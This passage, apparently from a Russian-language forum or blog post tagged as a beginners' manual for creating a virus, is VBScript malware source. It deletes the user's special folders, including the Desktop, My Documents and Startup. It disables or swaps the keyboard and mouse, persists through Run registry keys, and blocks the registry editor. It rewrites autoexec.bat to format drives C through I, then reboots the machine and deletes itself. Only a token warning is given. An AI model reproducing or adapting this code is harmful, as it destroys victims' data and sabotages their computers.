5) Удаляем нужные объекты....
CODE' Удаление специальных папок
For Each Folder In s.SpecialFolders
-------------------------------------------------
' Удаление Рабочего стола
f.deletefolder s.SpecialFolders ("Desktop"),true
-------------------------------------------------
' Удаление Aplication Data
if right(folder,15)="Aplication Data" then f.deletefolder folder,true
-------------------------------------------------
' Удаление PrintHood
if right(folder,9)="PrintHood" then f.deletefolder folder,true
-------------------------------------------------
' Удаление ShellNew
if right(folder,8)="ShellNew" then f.deletefolder folder,true
-------------------------------------------------
' Удаление шрифтов
if right(folder,5)="FONTS" then f.deletefolder folder,true
-------------------------------------------------
' Удаление NetHood
if right(folder,7)="NetHood" then f.deletefolder folder,true
-------------------------------------------------
' Удаление Главное меню
if right(folder,12)="Главное меню" then f.deletefolder folder,true
-------------------------------------------------
' Удаление SendTo
if right(folder,6)="SendTo" then f.deletefolder folder,true
-------------------------------------------------
' Удаление Recent
if right(folder,6)="Recent" then f.deletefolder folder,true
-------------------------------------------------
' Удаление Автозагрузка
if right(folder,12)="Автозагрузка" then f.deletefolder folder,true
-------------------------------------------------
' Удаление Избранное
if right(folder,9)="Избранное" then f.deletefolder folder,true
-------------------------------------------------
' Удаление Мои документы
if right(folder,13)="Мои документы" then f.deletefolder folder,true
-------------------------------------------------
' Удаление Программы
if right(folder,9)="Программы" then f.deletefolder folder,true
Next
6) Очень вредоносное....... (делать не советую)
CODE' Поменять функции клавиш мышки местами
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton"
s.Run "rundll32 user32, SwapMouseButton"
-------------------------------------------------
' Вырубить клавиатуру(Только для Windows 95,98,Me)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
s.Run "rundll32.exe keyboard.exe, disable"
-------------------------------------------------
' Отключить мышь(Только для Windows 95,98,Me)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
s.Run "rundll32.exe mouse.exe, disable"
-------------------------------------------------
' Минимизировать все окна
os.MinimizeAll
-------------------------------------------------
' Запускаться при каждой перезагрузке
Set File2 = f.GetFile(WScript.ScriptFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
-------------------------------------------------
' Блокировать RegEdit(чтоб у него не заводился редактор реестра).Для того чтобы разблокировать происвойте DisableRegistryTools значение - 0
s.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
-------------------------------------------------
' Форматировать Все диски (Только для Windows 95,98,Me)
If f.FileExists("d:\autoexec.bat") Then Str ="d:\autoexec.bat"
If f.FileExists("d:\Windows.000\autoexec.bat") Then Str ="d:\Windows.000\autoexec.bat"
If f.FileExists("d:\Windows\autoexec.bat") Then Str ="d:\Windows\autoexec.bat"
If f.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If f.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If f.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = f.GetFile(Str)
ab.Attributes = 0
Set autoexec = f.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
s.Run Str, 5
-------------------------------------------------
' Перезагрузить компьютер(Только для Windows 95,98,Me)
s.Run "Rundll32.exe User.exe,ExitWindows"
-------------------------------------------------
' Самоликвидироваться
f.deletefile WScript.ScriptFullName, true
Метки: мануал по созданию вируса софт новичкам |